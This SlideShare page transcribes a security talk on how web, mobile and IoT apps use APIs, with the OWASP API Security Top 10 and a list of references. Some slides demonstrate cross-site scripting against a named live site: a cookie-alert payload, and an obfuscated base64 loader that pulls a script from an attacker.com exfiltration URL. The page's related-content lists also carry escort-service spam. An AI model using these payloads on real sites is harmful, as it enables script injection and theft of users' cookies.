SlideShare a Scribd company logo

Web Apps APIs' Nightmare Guide

Paulo Silva
Paulo Silva

The document discusses the evolution of web applications from traditional to modern architectures. It explains how traditional web apps involved separate files (HTML, CSS, JS) retrieved through individual HTTP requests, while modern apps retrieve all code in a single bundle and make additional requests to APIs. It also covers how mobile, IoT and other connected apps interact through APIs instead of web pages. Finally, it lists the OWASP API Security Top 10 risks and provides additional resources on secure API development.

Software
1 of 48
www.char49.com TRUE SECURITY Web Apps: APIs’ Nightmare
● Security Researcher/Pentester ● 15+ years as a Software Developer ● Long-term OWASP Volunteer ● Strong believer in spreading security awareness Who Am I Paulo Silva @pauloasilva_com /devpauloasilva paulo@char49.com Web Apps: APIs’ Nightmare
source: https://home.cern/science/computing/birth-web
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET / Content-Type: text/html HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . GET /style/display.css Content-Type: text/css ... GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript GET / Content-Type: text/html php index.php login.php . . .
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server HTTP PHP Database scripts main.js . . . style display.js . . . images background.js . . . php index.php . . . ... GET /login.php Content-Type: text/html GET /style/display.css Content-Type: text/css GET /scripts/main.js Content-Type: application/javascript php index.php login.php . . . POST /login.php Content-Type: text/html
Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php posts.php comments.php . . .
Web Apps: APIs’ Nightmare Mobile Applications Client Server POST /login Content-Type: application/json HTTP PHP Database GET /users/me Content-Type: application/json . . . php auth.php users.php posts.php comments.php . . . Mobile Applications
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php . . . Mobile Applications
Web Apps: APIs’ Nightmare Client Server POST /login Content-Type: application/json HTTP PHP Database . . . php auth.php users.php GET /users/me Content-Type: application/json GET /posts/ Content-Type: application/json posts.php comments.php ... . . . Mobile Applications
Web Apps: APIs’ Nightmare
Web Apps: APIs’ Nightmare
Web Apps: APIs’ Nightmare Connected Things Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ...
Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs’ Nightmare Traditional Web Applications Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json Internet of Things Connected Things
Web Apps: APIs’ Nightmare Client Server GET /device/config Content-Type: application/json HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... POST /device/auth Content-Type: application/json POST /location Content-Type: application/json ... Connected Things
Web Apps: APIs’ Nightmare Modern Web Applications Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ...
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript Modern Web Applications
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json Modern Web Applications
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json
Web Apps: APIs’ Nightmare Client Server GET / Content-Type: text/html HTTP API 1 API 2 API 3 API N ... DB 1 DB 2 3rd Party APIs Service 1 Service 2 Service N Service 3 Service 4 ... ... public index.html bundle.js ... GET /bundle.js Content-Type: application/javascript POST /login Content-Type: application/json ... Modern Web Applications GET /places/1234 Content-Type: application/json ...
Web Apps: APIs’ Nightmare OWASP API Security Top 10 API1:2023 Broken Object-Level Authorization API2:2023 Broken Authentication API3:2023 Broken Object Property Level Authorization API4:2023 Unrestricted Resource Consumption API5:2023 Broken Function-Level Authorization API6:2023 Unrestricted Access to Sensitive Business Flows API7:2023 Server Side Request Forgery API8:2023 Security Misconfiguration API9:2023 Improper Inventory Management API10:2023 Unsafe Consumption of APIs
API API API API API API API API API API API API API Web Apps: APIs’ Nightmare API
Web Apps: APIs’ Nightmare Vulnerable Parameter Cross-Site Scripting https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=alert(document.cookie)>
Web Apps: APIs’ Nightmare Loader Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare Payload Payload https://campaigns.porsche.com/charging/WebAjaxGet? OpenAgent&typ=nummer&la=USen&pid=95998FB59237DF92C12586D800 37659B 111&ke=6546546<img src=x onerror=eval(atob(“KCgpID0+IHsKICBjb25zdCBzY3JpcHQgPSBkb2N1b WVudC5jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTsKICBzY3JpcHQuc3JjID 0gJ2h0dH BzOi8vYXR0YWNrZXIuY29tL2V4ZmlsdHJhdGUuanMnOwogIGRvY3VtZW5 0LmJvZHk uYXBwZW5kQ2hpbGQoc2NyaXB0KTsKfSkoKQ==”))> Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare Malicious Script HTTP Fundamentals Payload Cross-Site Scripting
Web Apps: APIs’ Nightmare OWASP Resources Other References ● OWASP API Security Project ● OWASP API Security Top 10 2023 ● OWASP API Security Top 10 2019 ● Goats ● OWASP Vulnerable Web Applications Directory ● OWASP crAPI - Completely Ridiculous API ● OWASP Juice Shop ● OWASP Cheat Sheets Series ● Authentication Cheat Sheet ● Authorization Cheat Sheet ● GraphQL Cheat Sheet ● REST Security Cheat Sheet ● Web Service Security Cheat Sheet ● OWASP Secure Coding Practices-Quick Reference Guide ● OWASP Go Secure Coding Practices Guide ● HTTP ● Basic of HTTP - mdn web docs ● Cross-Origin Resource Sharing (CORS) - mdn web docs ● API Protocols ● REST ● Representational state transfer - Wikipedia ● Representational State Transfer (REST) - Fielding Dissertation ● RPC ● Remote procedure call - Wikipedia ● OpenRPC ● JSON-RPC ● XML-RPC ● gRPC ● GraphQL ● Introduction to GraphQL ● GraphQL blogposts Series - Checkmarx ● Rate Limiting GraphQL APIs by Calculating Query Complexity - Shopify ● MindAPI ● MindAPI References
Web Apps: APIs’ Nightmare OWASP Resources Other References
www.char49.com Thank You!

Recommended

API Security - Null meet
API Security - Null meetAPI Security - Null meet
API Security - Null meetvinoth kumar
 
API Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsAPI Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsTom Johnson
 
How to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxHow to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxChanna Ly
 
Event-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivEvent-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivAmazon Web Services
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPIJie Liau
 
Events, Picos, and Microservices
Events, Picos, and MicroservicesEvents, Picos, and Microservices
Events, Picos, and MicroservicesPhil Windley
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Realtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesRealtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesAkhilesh Gupta
 

Recommended

API Security - Null meet
API Security - Null meetAPI Security - Null meet
API Security - Null meetvinoth kumar
 
API Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsAPI Workshop: Deep dive into REST APIs
API Workshop: Deep dive into REST APIsTom Johnson
 
How to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxHow to build Simple yet powerful API.pptx
How to build Simple yet powerful API.pptxChanna Ly
 
Event-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivEvent-Driven Serverless Apps - Pop-up Loft Tel Aviv
Event-Driven Serverless Apps - Pop-up Loft Tel AvivAmazon Web Services
 
HowYourAPIBeMyAPI
HowYourAPIBeMyAPIHowYourAPIBeMyAPI
HowYourAPIBeMyAPIJie Liau
 
Events, Picos, and Microservices
Events, Picos, and MicroservicesEvents, Picos, and Microservices
Events, Picos, and MicroservicesPhil Windley
 
Hacking Client Side Insecurities
Hacking Client Side InsecuritiesHacking Client Side Insecurities
Hacking Client Side Insecuritiesamiable_indian
 
Realtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesRealtime Content Delivery: Powering dynamic instant experiences
Realtime Content Delivery: Powering dynamic instant experiencesAkhilesh Gupta
 
Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesSungwon Lee
 
Design Web Api
Design Web ApiDesign Web Api
Design Web ApiTailor Fontela
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisTeodoro Cipresso
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発LINE Corporation
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncYan Cui
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsApigee | Google Cloud
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwasN6
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 OSSCube
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014JonAbrams
 
Api Testing
Api TestingApi Testing
Api TestingVishwanath KC
 
Api Testing
Api TestingApi Testing
Api TestingVishwanath KC
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the MassesDavid Tufts
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Daniel Zivkovic
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...Kim Clark
 
API Design- Best Practices
API Design- Best PracticesAPI Design- Best Practices
API Design- Best PracticesPrakash Bhandari
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationCA | Automic Software
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 

More Related Content

Similar to Web Apps APIs' Nightmare Guide

Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesSungwon Lee
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisTeodoro Cipresso
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発LINE Corporation
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncYan Cui
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsApigee | Google Cloud
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwas N
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdfVishwasN6
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 OSSCube
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014JonAbrams
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Servicestevemock
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...CA API Management
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the MassesDavid Tufts
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Daniel Zivkovic
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...Kim Clark
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationCA | Automic Software
 

Similar to Web Apps APIs' Nightmare Guide (20)

Running gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on KubernetesRunning gRPC Services for Serving Legacy API on Kubernetes
Running gRPC Services for Serving Legacy API on Kubernetes
 
Design Web Api
Design Web ApiDesign Web Api
Design Web Api
 
Z101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apisZ101666 best practices for delivering hybrid cloud capability with apis
Z101666 best practices for delivering hybrid cloud capability with apis
 
アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発アプリで簡単にスタンプを販売するためのAPI開発
アプリで簡単にスタンプを販売するためのAPI開発
 
Why your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSyncWhy your next serverless project should use AWS AppSync
Why your next serverless project should use AWS AppSync
 
API Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIsAPI Services: Building State-of-the-Art APIs
API Services: Building State-of-the-Art APIs
 
API Testing and Hacking (1).pdf
API Testing and Hacking (1).pdfAPI Testing and Hacking (1).pdf
API Testing and Hacking (1).pdf
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdf
 
API Testing and Hacking.pdf
API Testing and Hacking.pdfAPI Testing and Hacking.pdf
API Testing and Hacking.pdf
 
Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014 Apigility – Lightning Fast API Development - OSSCamp 2014
Apigility – Lightning Fast API Development - OSSCamp 2014
 
API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014API Prefetching - HTML5DevConf - Oct. 21, 2014
API Prefetching - HTML5DevConf - Oct. 21, 2014
 
Api Testing
Api TestingApi Testing
Api Testing
 
Api Testing
Api TestingApi Testing
Api Testing
 
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles ServiceAraport Workshop Tutorial 2: Authentication and the Agave Profiles Service
Araport Workshop Tutorial 2: Authentication and the Agave Profiles Service
 
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
Understanding Identity in the World of Web APIs – Ronnie Mitra, API Architec...
 
Web Apps for the Masses
Web Apps for the MassesWeb Apps for the Masses
Web Apps for the Masses
 
Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup Application Server-less Web Applications - Serverless Toronto Meetup
Application Server-less Web Applications - Serverless Toronto Meetup
 
What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...What’s behind a high quality web API? Ensure your APIs are more than just a ...
What’s behind a high quality web API? Ensure your APIs are more than just a ...
 
API Design- Best Practices
API Design- Best PracticesAPI Design- Best Practices
API Design- Best Practices
 
Automating Rackspace with ONE Automation
Automating Rackspace with ONE AutomationAutomating Rackspace with ONE Automation
Automating Rackspace with ONE Automation
 

Recently uploaded

(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataBradBedford3
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about usDynamic Netsoft
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...OnePlan Solutions
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...ICS
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVshikhaohhpro
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationkaushalgiri8080
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
What is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsWhat is Binary Language? Computer Number Systems
What is Binary Language? Computer Number SystemsJheuzeDellosa
 
Unveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsUnveiling the Tech Salsa of LAMs with Janus in Real-Time Applications
Unveiling the Tech Salsa of LAMs with Janus in Real-Time ApplicationsAlberto González Trastoy
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 

Recently uploaded (20)

(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
 
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer DataAdobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
Adobe Marketo Engage Deep Dives: Using Webhooks to Transfer Data
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
 
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
Call Girls In Mukherjee Nagar 📱 9999965857 🤩 Delhi 🫦 HOT AND SEXY VVIP 🍎 SE...
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The Ugly
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learning
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdf
 
DNT_Corporate presentation know about us
DNT_Corporate presentation know about usDNT_Corporate presentation know about us
DNT_Corporate presentation know about us
 
Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...Advancing Engineering with AI through the Next Generation of Strategic Projec...
Advancing Engineering with AI through the Next Generation of Strategic Projec...
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)
 
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
The Real-World Challenges of Medical Device Cybersecurity- Mitigating Vulnera...
 
Optimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTVOptimizing AI for immediate response in Smart CCTV
Optimizing AI for immediate response in Smart CCTV
 
Project Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanationProject Based Learning (A.I).pptx detail explanation
Project Based Learning (A.I).pptx detail explanation
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
